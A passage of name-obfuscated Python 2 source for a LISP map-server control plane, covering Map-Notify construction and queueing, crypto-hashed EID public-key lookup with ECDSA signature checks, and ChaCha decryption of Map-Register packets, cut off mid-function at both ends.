if ( site_eid . is_rtr_in_rloc_set ( xtr ) ) : ooo0O0OO = False
if 61 - 61: OoooooooOO + I11i + I11i / i1IIi
if 97 - 97: i11iIiiIii + oO0o % OOooOOo . OoO0O00 . OOooOOo % ooOoO0o
if 93 - 93: I1IiiI % i11iIiiIii
if 45 - 45: OoooooooOO * o0oOOo0O0Ooo - OOooOOo + O0
if 64 - 64: iII111i * I1ii11iIi11i - OoOoOO00
oO000oOoO0 = lisp_eid_record ( )
oO000oOoO0 . record_ttl = 1440
oO000oOoO0 . eid . copy_address ( site_eid . eid )
oO000oOoO0 . group . copy_address ( site_eid . group )
oO000oOoO0 . rloc_count = 0
for o0oO0O00 in site_eid . registered_rlocs :
if ( ooo0O0OO ^ o0oO0O00 . is_rtr ( ) ) : continue
oO000oOoO0 . rloc_count += 1
if 1 - 1: i1IIi / OoO0O00 % i1IIi % i11iIiiIii / i1IIi
IiiiIi1iiii11 = oO000oOoO0 . encode ( )
if 8 - 8: O0 / OOooOOo + iII111i % iIii1I11I1II1 % iIii1I11I1II1 . ooOoO0o
if 47 - 47: OoO0O00 / o0oOOo0O0Ooo / Ii1I * I1IiiI % ooOoO0o / I1Ii111
if 80 - 80: I1Ii111 / O0 * O0
if 40 - 40: OoO0O00 - oO0o / o0oOOo0O0Ooo . oO0o
Ii1ii1 . print_notify ( )
oO000oOoO0 . print_record ( " " , False )
if 89 - 89: i11iIiiIii - II111iiii
if 67 - 67: IiII % I1Ii111 + i11iIiiIii
if 53 - 53: OOooOOo
if 95 - 95: oO0o - OOooOOo % I1Ii111 / OoooooooOO % OoooooooOO - O0
for o0oO0O00 in site_eid . registered_rlocs :
if ( ooo0O0OO ^ o0oO0O00 . is_rtr ( ) ) : continue
oOOo = lisp_rloc_record ( )
oOOo . store_rloc_entry ( o0oO0O00 )
IiiiIi1iiii11 += oOOo . encode ( )
oOOo . print_record ( " " )
if 21 - 21: I1Ii111 . i1IIi - iII111i % I1ii11iIi11i . OOooOOo
if 52 - 52: Ii1I * I1ii11iIi11i
if 21 - 21: I1IiiI . i11iIiiIii - o0oOOo0O0Ooo * II111iiii % iIii1I11I1II1
if 9 - 9: I1ii11iIi11i + I11i
if 20 - 20: iII111i + i1IIi / oO0o % OoooooooOO * OoOoOO00
IiiiIi1iiii11 = Ii1ii1 . encode ( IiiiIi1iiii11 , "" )
if ( IiiiIi1iiii11 == None ) : return
if 70 - 70: Oo0Ooo - OOooOOo * OOooOOo / o0oOOo0O0Ooo
if 4 - 4: OoOoOO00 / OoO0O00
if 66 - 66: I1Ii111 / OoOoOO00
if 53 - 53: OoOoOO00 . i11iIiiIii - OoooooooOO
lisp_send_map_notify ( lisp_sockets , IiiiIi1iiii11 , xtr , LISP_CTRL_PORT )
if 92 - 92: O0 - i11iIiiIii + OoO0O00 - OoooooooOO - o0oOOo0O0Ooo
if 25 - 25: oO0o / oO0o / Ii1I / O0
if 56 - 56: ooOoO0o
if 19 - 19: O0 * I1IiiI + I1ii11iIi11i
Ii1ii1 . retransmit_timer = threading . Timer ( LISP_MAP_NOTIFY_INTERVAL ,
lisp_retransmit_map_notify , [ Ii1ii1 ] )
Ii1ii1 . retransmit_timer . start ( )
return
if 25 - 25: I11i - ooOoO0o / OoO0O00 / iII111i - OoO0O00
if 86 - 86: OoO0O00
if 89 - 89: OoooooooOO % iII111i * I1ii11iIi11i + I1ii11iIi11i . Oo0Ooo
if 4 - 4: I11i
if 8 - 8: IiII
if 1 - 1: ooOoO0o . IiII
if 4 - 4: iIii1I11I1II1 % I1IiiI - OoooooooOO / iII111i
def lisp_queue_multicast_map_notify ( lisp_sockets , rle_list ) :
Oo00oO0 = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 3 - 3: oO0o % I1IiiI - O0
for Oo0ooO in rle_list :
IiIIiIII1I1i = lisp_site_eid_lookup ( Oo0ooO [ 0 ] , Oo0ooO [ 1 ] , True )
if ( IiIIiIII1I1i == None ) : continue
if 25 - 25: OoO0O00 % IiII . i1IIi / OoOoOO00 + OoOoOO00
if 53 - 53: II111iiii % i1IIi + ooOoO0o . I1Ii111
if 52 - 52: I1IiiI + I1Ii111 * oO0o / i11iIiiIii * iIii1I11I1II1
if 27 - 27: Oo0Ooo
if 85 - 85: iIii1I11I1II1 . o0oOOo0O0Ooo + oO0o
if 79 - 79: O0 - iIii1I11I1II1 + i1IIi . I11i
if 21 - 21: II111iiii
I1iiiII1Ii1i1 = IiIIiIII1I1i . registered_rlocs
if ( len ( I1iiiII1Ii1i1 ) == 0 ) :
iII1iI1IIiii = { }
for iIiIi1I in IiIIiIII1I1i . individual_registrations . values ( ) :
for o0oO0O00 in iIiIi1I . registered_rlocs :
if ( o0oO0O00 . is_rtr ( ) == False ) : continue
iII1iI1IIiii [ o0oO0O00 . rloc . print_address ( ) ] = o0oO0O00
if 45 - 45: o0oOOo0O0Ooo + iIii1I11I1II1 / O0
if 2 - 2: I11i + I1IiiI . IiII . OoOoOO00 * oO0o - ooOoO0o
I1iiiII1Ii1i1 = iII1iI1IIiii . values ( )
if 29 - 29: OoO0O00
if 78 - 78: iII111i * ooOoO0o + O0 % ooOoO0o + OoO0O00
if 41 - 41: II111iiii . oO0o + O0 % i1IIi . Ii1I
if 90 - 90: ooOoO0o * I1IiiI / II111iiii % Oo0Ooo % OoooooooOO
if 78 - 78: OoooooooOO . IiII
if 55 - 55: I11i / I1ii11iIi11i * O0 + IiII % I11i
OOooOo00Ooo = [ ]
o00O0o0O0O0o = False
if ( IiIIiIII1I1i . eid . address == 0 and IiIIiIII1I1i . eid . mask_len == 0 ) :
o0ooOO0OOO00O0 = [ ]
II11Ii1i1iiII = [ ]
if ( len ( I1iiiII1Ii1i1 ) != 0 and I1iiiII1Ii1i1 [ 0 ] . rle != None ) :
II11Ii1i1iiII = I1iiiII1Ii1i1 [ 0 ] . rle . rle_nodes
if 38 - 38: I1ii11iIi11i + i1IIi % iIii1I11I1II1
for IiioOoo in II11Ii1i1iiII :
OOooOo00Ooo . append ( IiioOoo . address )
o0ooOO0OOO00O0 . append ( IiioOoo . address . print_address_no_iid ( ) )
if 96 - 96: OoOoOO00 - OoOoOO00
lprint ( "Notify existing RLE-nodes {}" . format ( o0ooOO0OOO00O0 ) )
else :
if 59 - 59: OoOoOO00 / iII111i * i11iIiiIii
if 61 - 61: I1Ii111 % oO0o - OOooOOo
if 91 - 91: o0oOOo0O0Ooo * Oo0Ooo
if 59 - 59: iIii1I11I1II1 / Oo0Ooo % II111iiii
if 55 - 55: ooOoO0o - IiII + o0oOOo0O0Ooo
for o0oO0O00 in I1iiiII1Ii1i1 :
if ( o0oO0O00 . is_rtr ( ) ) : OOooOo00Ooo . append ( o0oO0O00 . rloc )
if 48 - 48: O0 - iIii1I11I1II1 * OOooOOo
if 33 - 33: I11i
if 63 - 63: Ii1I % II111iiii / OoOoOO00 + Oo0Ooo
if 28 - 28: OoO0O00 + I1IiiI . oO0o + II111iiii - O0
if 32 - 32: oO0o
o00O0o0O0O0o = ( len ( OOooOo00Ooo ) != 0 )
if ( o00O0o0O0O0o == False ) :
oOOOO0ooo = lisp_site_eid_lookup ( Oo0ooO [ 0 ] , Oo00oO0 , False )
if ( oOOOO0ooo == None ) : continue
if 62 - 62: i11iIiiIii + OoooooooOO + IiII - OoO0O00 / oO0o * iIii1I11I1II1
for o0oO0O00 in oOOOO0ooo . registered_rlocs :
if ( o0oO0O00 . rloc . is_null ( ) ) : continue
OOooOo00Ooo . append ( o0oO0O00 . rloc )
if 91 - 91: o0oOOo0O0Ooo - i11iIiiIii + Oo0Ooo % iIii1I11I1II1
if 58 - 58: iII111i / ooOoO0o - I1Ii111 + I1Ii111 * ooOoO0o
if 48 - 48: iII111i % O0 % Ii1I * OoO0O00 . OoO0O00
if 74 - 74: OoO0O00 * i1IIi + I1ii11iIi11i / o0oOOo0O0Ooo / i1IIi
if 94 - 94: Ii1I
if 13 - 13: OoO0O00 - II111iiii . iII111i + OoOoOO00 / i11iIiiIii
if ( len ( OOooOo00Ooo ) == 0 ) :
lprint ( "No ITRs or RTRs found for {}, Map-Notify suppressed" . format ( green ( IiIIiIII1I1i . print_eid_tuple ( ) , False ) ) )
if 32 - 32: ooOoO0o / II111iiii / I1ii11iIi11i
continue
if 34 - 34: iIii1I11I1II1
if 47 - 47: OOooOOo * iII111i
if 71 - 71: IiII - OoooooooOO * i11iIiiIii . OoooooooOO % i1IIi . Oo0Ooo
if 3 - 3: OoO0O00 + i11iIiiIii + oO0o * IiII
if 19 - 19: iII111i / II111iiii . I1Ii111 * I1IiiI - OOooOOo
if 70 - 70: OoO0O00
for iI11IiI1 in OOooOo00Ooo :
lprint ( "Build Map-Notify to {}TR {} for {}" . format ( "R" if o00O0o0O0O0o else "x" , red ( iI11IiI1 . print_address_no_iid ( ) , False ) ,
# OOooOOo * OoO0O00 / I1Ii111
green ( IiIIiIII1I1i . print_eid_tuple ( ) , False ) ) )
if 96 - 96: iII111i * iII111i / iII111i + I1IiiI
i1I1i = [ IiIIiIII1I1i . print_eid_tuple ( ) ]
lisp_send_multicast_map_notify ( lisp_sockets , IiIIiIII1I1i , i1I1i , iI11IiI1 )
time . sleep ( .001 )
if 87 - 87: IiII * I1Ii111 * O0 % O0 + i1IIi
if 54 - 54: OOooOOo
return
if 88 - 88: OoooooooOO / iII111i + i1IIi
if 64 - 64: IiII % I11i / iIii1I11I1II1
if 66 - 66: Ii1I
if 55 - 55: OOooOOo + I1IiiI + IiII . Ii1I * oO0o
if 71 - 71: IiII - iII111i % I1IiiI * iII111i
if 27 - 27: ooOoO0o - OoO0O00
if 83 - 83: iII111i * OoOoOO00 - O0 * Ii1I
if 79 - 79: I11i / iII111i % Ii1I / OoOoOO00 % O0 / IiII
def lisp_find_sig_in_rloc_set ( packet , rloc_count ) :
for iIi1I1 in range ( rloc_count ) :
oOOo = lisp_rloc_record ( )
packet = oOOo . decode ( packet , None )
i1ii11ii1iiI = oOOo . json
if ( i1ii11ii1iiI == None ) : continue
if 67 - 67: oO0o . I1IiiI % i1IIi - OoO0O00
try :
i1ii11ii1iiI = json . loads ( i1ii11ii1iiI . json_string )
except :
lprint ( "Found corrupted JSON signature" )
continue
if 33 - 33: I1IiiI / I1IiiI / I1ii11iIi11i * IiII / Ii1I
if 55 - 55: i11iIiiIii / OoooooooOO - Ii1I * Oo0Ooo . I1Ii111
if ( i1ii11ii1iiI . has_key ( "signature" ) == False ) : continue
return ( oOOo )
if 96 - 96: IiII / OoooooooOO + i11iIiiIii . Ii1I
return ( None )
if 64 - 64: OoooooooOO / IiII - IiII . Ii1I % Oo0Ooo
if 35 - 35: iII111i * I1IiiI * Oo0Ooo + I1Ii111 + i1IIi - ooOoO0o
if 23 - 23: II111iiii - O0
if 58 - 58: o0oOOo0O0Ooo * OoO0O00 + OoO0O00
if 93 - 93: IiII - I1ii11iIi11i % I11i + i1IIi % OoO0O00
if 20 - 20: oO0o . Oo0Ooo + IiII - II111iiii % Ii1I
if 64 - 64: Ii1I % OoO0O00 + OOooOOo % OoOoOO00 + IiII
if 92 - 92: iII111i * Oo0Ooo - OoOoOO00
if 33 - 33: i11iIiiIii - OoOoOO00 . OOooOOo * II111iiii . Ii1I
if 59 - 59: OoOoOO00
if 29 - 29: iII111i - II111iiii * OoooooooOO * OoooooooOO
if 15 - 15: IiII / OOooOOo / iIii1I11I1II1 / OoOoOO00
if 91 - 91: i11iIiiIii % O0 . Oo0Ooo / I1Ii111
if 62 - 62: Oo0Ooo . II111iiii % OoO0O00 . Ii1I * OOooOOo + II111iiii
if 7 - 7: OOooOOo
if 22 - 22: Oo0Ooo + ooOoO0o
if 71 - 71: OOooOOo . Ii1I * i11iIiiIii . I11i
if 9 - 9: O0 / I1ii11iIi11i . iII111i . O0 + IiII % I11i
if 27 - 27: i11iIiiIii - I1ii11iIi11i / O0 - i1IIi + I1IiiI * iII111i
def lisp_get_eid_hash ( eid ) :
iI1iIIIIiiii = None
for IiI1Iiii in lisp_eid_hashes :
if 7 - 7: OoOoOO00 + OoO0O00 * I1IiiI
if 63 - 63: I1ii11iIi11i + iII111i * i1IIi
if 63 - 63: I1ii11iIi11i / II111iiii % oO0o + ooOoO0o . Ii1I % I11i
if 59 - 59: I1Ii111 % o0oOOo0O0Ooo - I1IiiI * i1IIi
IiIIi11i111 = IiI1Iiii . instance_id
if ( IiIIi11i111 == - 1 ) : IiI1Iiii . instance_id = eid . instance_id
if 5 - 5: I1IiiI
ii1i = eid . is_more_specific ( IiI1Iiii )
IiI1Iiii . instance_id = IiIIi11i111
if ( ii1i ) :
iI1iIIIIiiii = 128 - IiI1Iiii . mask_len
break
if 79 - 79: OoooooooOO . OoOoOO00 * OoO0O00 + I11i / iII111i - Ii1I
if 9 - 9: I1IiiI - IiII . iIii1I11I1II1
if ( iI1iIIIIiiii == None ) : return ( None )
if 99 - 99: iII111i / o0oOOo0O0Ooo
ii1i1II11II1i = eid . address
IIiiI1 = ""
for iIi1I1 in range ( 0 , iI1iIIIIiiii / 16 ) :
o0o00O0oOooO0 = ii1i1II11II1i & 0xffff
o0o00O0oOooO0 = hex ( o0o00O0oOooO0 ) [ 2 : - 1 ]
IIiiI1 = o0o00O0oOooO0 . zfill ( 4 ) + ":" + IIiiI1
ii1i1II11II1i >>= 16
if 92 - 92: iII111i * i11iIiiIii * o0oOOo0O0Ooo * OoO0O00
if ( iI1iIIIIiiii % 16 != 0 ) :
o0o00O0oOooO0 = ii1i1II11II1i & 0xff
o0o00O0oOooO0 = hex ( o0o00O0oOooO0 ) [ 2 : - 1 ]
IIiiI1 = o0o00O0oOooO0 . zfill ( 2 ) + ":" + IIiiI1
if 70 - 70: Ii1I
return ( IIiiI1 [ 0 : - 1 ] )
if 51 - 51: i1IIi % Oo0Ooo
if 32 - 32: OoOoOO00 + iIii1I11I1II1 . OoO0O00 . I1ii11iIi11i . IiII
if 97 - 97: ooOoO0o * ooOoO0o * iIii1I11I1II1 * I1Ii111 + iII111i + OoOoOO00
if 8 - 8: Oo0Ooo . oO0o + II111iiii
if 100 - 100: OoOoOO00 . IiII / OoO0O00 * OoooooooOO - OoOoOO00
if 98 - 98: OoO0O00 / I1ii11iIi11i + I1ii11iIi11i
if 70 - 70: i1IIi % Oo0Ooo % I1Ii111 + I11i . ooOoO0o
if 66 - 66: i11iIiiIii % I11i / Oo0Ooo * oO0o
if 7 - 7: O0 - Ii1I - oO0o
if 95 - 95: i1IIi - OOooOOo / OoOoOO00 + I1ii11iIi11i + O0
if 10 - 10: ooOoO0o - OOooOOo + i1IIi * Ii1I
def lisp_lookup_public_key ( eid ) :
IiIIi11i111 = eid . instance_id
if 78 - 78: iIii1I11I1II1
if 76 - 76: ooOoO0o - i11iIiiIii * I11i / I1IiiI - OOooOOo
if 41 - 41: iII111i
if 91 - 91: I1Ii111
if 54 - 54: o0oOOo0O0Ooo . i1IIi / iII111i
ii1III1 = lisp_get_eid_hash ( eid )
if ( ii1III1 == None ) : return ( [ None , None , False ] )
if 93 - 93: I1Ii111 . II111iiii
ii1III1 = "hash-" + ii1III1
ooO = lisp_address ( LISP_AFI_NAME , ii1III1 , len ( ii1III1 ) , IiIIi11i111 )
OOo0oOOO0 = lisp_address ( LISP_AFI_NONE , "" , 0 , IiIIi11i111 )
if 71 - 71: iII111i . II111iiii + i11iIiiIii
if 41 - 41: oO0o . o0oOOo0O0Ooo . I11i
if 53 - 53: I11i
if 64 - 64: OoO0O00 + I11i / I1IiiI . II111iiii
oOOOO0ooo = lisp_site_eid_lookup ( ooO , OOo0oOOO0 , True )
if ( oOOOO0ooo == None ) : return ( [ ooO , None , False ] )
if 79 - 79: I1Ii111 + IiII / OoooooooOO
if 53 - 53: Ii1I
if 85 - 85: OoO0O00 + II111iiii / OoO0O00 . II111iiii * OoOoOO00 * I1IiiI
if 19 - 19: iII111i / Ii1I + iIii1I11I1II1 * O0 - Oo0Ooo
OoOoOoooOoo0 = None
for I1II in oOOOO0ooo . registered_rlocs :
iiIiIiIiII = I1II . json
if ( iiIiIiIiII == None ) : continue
try :
iiIiIiIiII = json . loads ( iiIiIiIiII . json_string )
except :
lprint ( "Registered RLOC JSON format is invalid for {}" . format ( ii1III1 ) )
if 89 - 89: o0oOOo0O0Ooo / i11iIiiIii
return ( [ ooO , None , False ] )
if 42 - 42: II111iiii + i1IIi
if ( iiIiIiIiII . has_key ( "public-key" ) == False ) : continue
OoOoOoooOoo0 = iiIiIiIiII [ "public-key" ]
break
if 67 - 67: OoOoOO00
return ( [ ooO , OoOoOoooOoo0 , True ] )
if 5 - 5: Oo0Ooo / OoooooooOO / Ii1I * I1Ii111
if 37 - 37: Ii1I * o0oOOo0O0Ooo
if 39 - 39: OoooooooOO
if 37 - 37: OoO0O00 . iII111i
if 32 - 32: II111iiii
if 11 - 11: i11iIiiIii - OOooOOo . i1IIi + OOooOOo - O0
if 17 - 17: i1IIi % o0oOOo0O0Ooo % ooOoO0o / I11i
if 68 - 68: OoOoOO00
def lisp_verify_cga_sig ( eid , rloc_record ) :
if 14 - 14: iIii1I11I1II1 + oO0o / ooOoO0o
if 20 - 20: I1ii11iIi11i . II111iiii % I1Ii111 + I1Ii111 / OoooooooOO . Ii1I
if 98 - 98: OoooooooOO - i11iIiiIii - iII111i + Ii1I - I1IiiI
if 75 - 75: OOooOOo
if 25 - 25: iII111i / I1ii11iIi11i - ooOoO0o
i1i11 = json . loads ( rloc_record . json . json_string )
if 53 - 53: IiII / OoooooooOO / ooOoO0o + Oo0Ooo - OOooOOo - iIii1I11I1II1
if ( lisp_get_eid_hash ( eid ) ) :
I1IiI11 = eid
elif ( i1i11 . has_key ( "signature-eid" ) ) :
O0iIII = i1i11 [ "signature-eid" ]
I1IiI11 = lisp_address ( LISP_AFI_IPV6 , O0iIII , 0 , 0 )
else :
lprint ( " No signature-eid found in RLOC-record" )
return ( False )
if 53 - 53: I11i . OoooooooOO * I1Ii111
if 100 - 100: O0
if 99 - 99: OoO0O00 * I1Ii111 % I11i / OoOoOO00
if 95 - 95: II111iiii . ooOoO0o + O0
if 58 - 58: iII111i + iIii1I11I1II1 % oO0o % OoooooooOO
ooO , OoOoOoooOoo0 , O0OOo0oO0OO0 = lisp_lookup_public_key ( I1IiI11 )
if ( ooO == None ) :
Ii1i1 = green ( I1IiI11 . print_address ( ) , False )
lprint ( " Could not parse hash in EID {}" . format ( Ii1i1 ) )
return ( False )
if 64 - 64: II111iiii - oO0o / iIii1I11I1II1 . Ii1I
if 23 - 23: o0oOOo0O0Ooo + I1IiiI
ooOoOO0o = "found" if O0OOo0oO0OO0 else bold ( "not found" , False )
Ii1i1 = green ( ooO . print_address ( ) , False )
lprint ( " Lookup for crypto-hashed EID {} {}" . format ( Ii1i1 , ooOoOO0o ) )
if ( O0OOo0oO0OO0 == False ) : return ( False )
if 60 - 60: I1ii11iIi11i * i11iIiiIii + oO0o
if ( OoOoOoooOoo0 == None ) :
lprint ( " RLOC-record with public-key not found" )
return ( False )
if 59 - 59: I11i
if 61 - 61: IiII * I1Ii111 * OoO0O00 / oO0o - OoooooooOO
iI11i11ii11 = OoOoOoooOoo0 [ 0 : 8 ] + "..." + OoOoOoooOoo0 [ - 8 : : ]
lprint ( " RLOC-record with public-key '{}' found" . format ( iI11i11ii11 ) )
if 48 - 48: II111iiii
if 79 - 79: II111iiii % II111iiii
if 85 - 85: OoooooooOO / o0oOOo0O0Ooo * I11i + iII111i
if 99 - 99: i11iIiiIii / oO0o . i11iIiiIii
if 46 - 46: I1ii11iIi11i
II1I1IIi1111I = i1i11 [ "signature" ]
if 3 - 3: iII111i / i11iIiiIii % OOooOOo + Ii1I . Oo0Ooo
try :
i1i11 = binascii . a2b_base64 ( II1I1IIi1111I )
except :
lprint ( " Incorrect padding in signature string" )
return ( False )
if 16 - 16: oO0o / Ii1I % i11iIiiIii % I1IiiI * I1ii11iIi11i
if 4 - 4: iIii1I11I1II1 + Ii1I % I1Ii111 . OoOoOO00 % OoooooooOO + II111iiii
i111Ii = len ( i1i11 )
if ( i111Ii & 1 ) :
lprint ( " Signature length is odd, length {}" . format ( i111Ii ) )
return ( False )
if 14 - 14: oO0o . OOooOOo * OOooOOo . OoO0O00
if 27 - 27: OOooOOo - iII111i - IiII
if 14 - 14: i11iIiiIii . I1ii11iIi11i % OoOoOO00 * Ii1I / OoO0O00
if 56 - 56: o0oOOo0O0Ooo / I1IiiI + I11i + I1IiiI
if 34 - 34: Oo0Ooo / i11iIiiIii - ooOoO0o
i11I1iiI1iI = I1IiI11 . print_address ( )
if 77 - 77: OoOoOO00 * OoooooooOO
if 41 - 41: iIii1I11I1II1 - O0 . II111iiii + I1IiiI - II111iiii / oO0o
if 35 - 35: ooOoO0o - OoOoOO00 / iIii1I11I1II1 / OOooOOo
if 38 - 38: i1IIi % OoooooooOO
OoOoOoooOoo0 = binascii . a2b_base64 ( OoOoOoooOoo0 )
try :
o0Oo = ecdsa . VerifyingKey . from_pem ( OoOoOoooOoo0 )
except :
IiiiIi = bold ( "Bad public-key" , False )
lprint ( " {}, not in PEM format" . format ( IiiiIi ) )
return ( False )
if 54 - 54: OOooOOo * I1ii11iIi11i + OoooooooOO
if 58 - 58: i1IIi - OoooooooOO * OOooOOo . ooOoO0o + O0 + o0oOOo0O0Ooo
if 87 - 87: OOooOOo + I1Ii111 + O0 / oO0o / i11iIiiIii
if 60 - 60: O0 . II111iiii
if 69 - 69: II111iiii / ooOoO0o - OoOoOO00 / OOooOOo
if 52 - 52: OoO0O00 % I11i + o0oOOo0O0Ooo % OoOoOO00
if 46 - 46: o0oOOo0O0Ooo % O0
if 30 - 30: oO0o
if 64 - 64: O0
if 70 - 70: oO0o % I1IiiI . iIii1I11I1II1 - Oo0Ooo + OoOoOO00 % O0
if 91 - 91: I1Ii111 - oO0o * ooOoO0o - I1ii11iIi11i + IiII + O0
try :
OoOoO00OoOOo = o0Oo . verify ( i1i11 , i11I1iiI1iI , hashfunc = hashlib . sha256 )
except :
lprint ( " Signature library failed for signature data '{}'" . format ( i11I1iiI1iI ) )
if 18 - 18: OoOoOO00 / IiII / o0oOOo0O0Ooo . OOooOOo
lprint ( " Signature used '{}'" . format ( II1I1IIi1111I ) )
return ( False )
if 35 - 35: I11i . ooOoO0o % I11i / iII111i / O0 % I11i
return ( OoOoO00OoOOo )
if 29 - 29: I1Ii111 + Ii1I
if 100 - 100: Ii1I + I1Ii111 / iIii1I11I1II1 / i1IIi % OoOoOO00
if 6 - 6: oO0o + ooOoO0o
if 13 - 13: Oo0Ooo . IiII % iII111i + i1IIi / OOooOOo
if 1 - 1: I11i * i1IIi * Oo0Ooo % O0
if 41 - 41: OOooOOo % OoOoOO00
if 82 - 82: I11i . IiII
if 27 - 27: I1Ii111 % O0 * OoooooooOO . Oo0Ooo
if 51 - 51: I11i
if 80 - 80: Oo0Ooo + oO0o
def lisp_remove_eid_from_map_notify_queue ( eid_list ) :
if 76 - 76: I1IiiI * OoooooooOO - i11iIiiIii / I11i / Oo0Ooo
if 82 - 82: IiII % ooOoO0o
if 100 - 100: Oo0Ooo . oO0o - iII111i + OoooooooOO
if 27 - 27: Oo0Ooo . I1Ii111 - i1IIi * I1IiiI
if 96 - 96: I1ii11iIi11i - Ii1I . I1ii11iIi11i
Oo0Oo00O000 = [ ]
for o0oOo0oo0 in eid_list :
for iiI1IiII1iI in lisp_map_notify_queue :
Ii1ii1 = lisp_map_notify_queue [ iiI1IiII1iI ]
if ( o0oOo0oo0 not in Ii1ii1 . eid_list ) : continue
if 54 - 54: IiII - I11i % OoooooooOO
Oo0Oo00O000 . append ( iiI1IiII1iI )
iiI1I = Ii1ii1 . retransmit_timer
if ( iiI1I ) : iiI1I . cancel ( )
if 87 - 87: OoOoOO00 * I11i * Ii1I / O0 + OOooOOo
lprint ( "Remove from Map-Notify queue nonce 0x{} for EID {}" . format ( Ii1ii1 . nonce_key , green ( o0oOo0oo0 , False ) ) )
if 81 - 81: iIii1I11I1II1 * iII111i . iIii1I11I1II1 - i1IIi % OOooOOo - I1Ii111
if 77 - 77: iIii1I11I1II1 % II111iiii
if 33 - 33: II111iiii
if 60 - 60: iIii1I11I1II1 / OOooOOo
if 78 - 78: i11iIiiIii
if 20 - 20: OoooooooOO * OoooooooOO - OOooOOo
if 34 - 34: I1ii11iIi11i * i1IIi % OoooooooOO / I1IiiI
for iiI1IiII1iI in Oo0Oo00O000 : lisp_map_notify_queue . pop ( iiI1IiII1iI )
return
if 39 - 39: OoO0O00 + IiII - II111iiii % I11i
if 80 - 80: o0oOOo0O0Ooo * ooOoO0o
if 87 - 87: I1Ii111 + O0 / I1ii11iIi11i / OoOoOO00 . Oo0Ooo - IiII
if 24 - 24: OoOoOO00
if 19 - 19: ooOoO0o
if 43 - 43: O0 . I1Ii111 % OoooooooOO / I1IiiI . o0oOOo0O0Ooo - OoOoOO00
if 46 - 46: I11i - OoooooooOO % o0oOOo0O0Ooo
if 7 - 7: OoooooooOO - I1Ii111 * IiII
def lisp_decrypt_map_register ( packet ) :
if 20 - 20: o0oOOo0O0Ooo . OoooooooOO * I1IiiI . Oo0Ooo * OoOoOO00
if 3 - 3: I1Ii111 % i11iIiiIii % O0 % II111iiii
if 8 - 8: OoooooooOO * ooOoO0o
if 26 - 26: i11iIiiIii + oO0o - i1IIi
if 71 - 71: I1IiiI % I1Ii111 / oO0o % oO0o / iIii1I11I1II1 + I1Ii111
O00O0OO = socket . ntohl ( struct . unpack ( "I" , packet [ 0 : 4 ] ) [ 0 ] )
O00oOO0OO00 = ( O00O0OO >> 13 ) & 0x1
if ( O00oOO0OO00 == 0 ) : return ( packet )
if 61 - 61: I1ii11iIi11i % I1IiiI % OoOoOO00
oo0Oo00oOO = ( O00O0OO >> 14 ) & 0x7
if 88 - 88: OoO0O00
if 82 - 82: OOooOOo / I11i / OoooooooOO % oO0o
if 27 - 27: oO0o + IiII
if 5 - 5: iIii1I11I1II1 + OoOoOO00 * I1Ii111 * i11iIiiIii
try :
II11iI11i1 = lisp_ms_encryption_keys [ oo0Oo00oOO ]
II11iI11i1 = II11iI11i1 . zfill ( 32 )
OO000OOOo0Oo = "0" * 8
except :
lprint ( "Cannot decrypt Map-Register with key-id {}" . format ( oo0Oo00oOO ) )
return ( None )
if 37 - 37: I1IiiI / OoO0O00 . OoO0O00 + i11iIiiIii - oO0o
if 57 - 57: I1IiiI . OoO0O00
o0 = bold ( "Decrypt" , False )
lprint ( "{} Map-Register with key-id {}" . format ( o0 , oo0Oo00oOO ) )
if 49 - 49: II111iiii + iII111i
i1o0 = chacha . ChaCha ( II11iI11i1 , OO000OOOo0Oo ) . decrypt ( packet [ 4 : : ] )
return ( packet [ 0 : 4 ] + i1o0 )
if 85 - 85: I11i / i11iIiiIii
if 33 - 33: iIii1I11I1II1 % O0 + II111iiii * OOooOOo . Ii1I * iII111i
if 48 - 48: I11i * iIii1I11I1II1 / oO0o
if 34 - 34: i1IIi + oO0o * Oo0Ooo * I1Ii111 % OoooooooOO % ooOoO0o
if 17 - 17: I1ii11iIi11i + o0oOOo0O0Ooo / OoO0O00 . Oo0Ooo - o0oOOo0O0Ooo / oO0o
if 87 - 87: ooOoO0o
if 74 - 74: i11iIiiIii . i11iIiiIii . iIii1I11I1II1
def lisp_process_map_register ( lisp_sockets , packet , source , sport ) :
global lisp_registered_count
if 100 - 100: i11iIiiIii - oO0o + iIii1I11I1II1 * OoOoOO00 % OOooOOo % i11iIiiIii
if 26 - 26: O0
if 97 - 97: OOooOOo + I11i % I1Ii111 % i11iIiiIii / I1ii11iIi11i
if 21 - 21: O0 + iIii1I11I1II1 / i11iIiiIii . OOooOOo * i1IIi
if 3 - 3: i1IIi % o0oOOo0O0Ooo + OoOoOO00
if 32 - 32: OoO0O00 . Oo0Ooo * iIii1I11I1II1
packet = lisp_decrypt_map_register ( packet )
if ( packet == None ) : return
if 12 - 12: O0 + I1ii11iIi11i + I11i . I1Ii111
I1ooo0o00o0Oooo = lisp_map_register ( )
oO0ooOoOooO00o00 , packet = I1ooo0o00o0Oooo . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Register packet" )
return
if 86 - 86: II111iiii . OoOoOO00 % I1IiiI * OOooOOo . OoOoOO00 + O0
I1ooo0o00o0Oooo . sport = sport
if 15 - 15: i11iIiiIii / I1IiiI - iII111i
I1ooo0o00o0Oooo . print_map_register ( )
if 75 - 75: o0oOOo0O0Ooo . I11i
if 4 - 4: iIii1I11I1II1 % i1IIi % i11iIiiIii / OOooOOo
if 93 - 93: I1ii11iIi11i - iII111i % O0 - Ii1I
if 84 - 84: I1ii11iIi11i . iIii1I11I1II1 % IiII * I11i + ooOoO0o
OOOO00OO0O0o = True
if ( I1ooo0o00o0Oooo . auth_len == LISP_SHA1_160_AUTH_DATA_LEN ) :
OOOO00OO0O0o = True
if 20 - 20: iIii1I11I1II1 % oO0o + o0oOOo0O0Ooo + oO0o % IiII
if ( I1ooo0o00o0Oooo . alg_id == LISP_SHA_256_128_ALG_ID ) :
OOOO00OO0O0o = False
if 84 - 84: IiII - O0 . I1ii11iIi11i % OOooOOo % iII111i + OoooooooOO
if 74 - 74: o0oOOo0O0Ooo + OoOoOO00 - o0oOOo0O0Ooo
if 2 - 2: OOooOOo
if 14 - 14: Ii1I - O0 - IiII % Ii1I / OoOoOO00 * OoooooooOO
if 57 - 57: Oo0Ooo % Oo0Ooo % O0 . I1Ii111 % I1ii11iIi11i
OO0O0O00Oo = [ ]
if 9 - 9: i11iIiiIii - i11iIiiIii / OOooOOo - ooOoO0o % OoOoOO00 + Ii1I
if 3 - 3: iII111i / I1ii11iIi11i / I1IiiI - Oo0Ooo
if 71 - 71: i11iIiiIii + Oo0Ooo % i11iIiiIii - i11iIiiIii
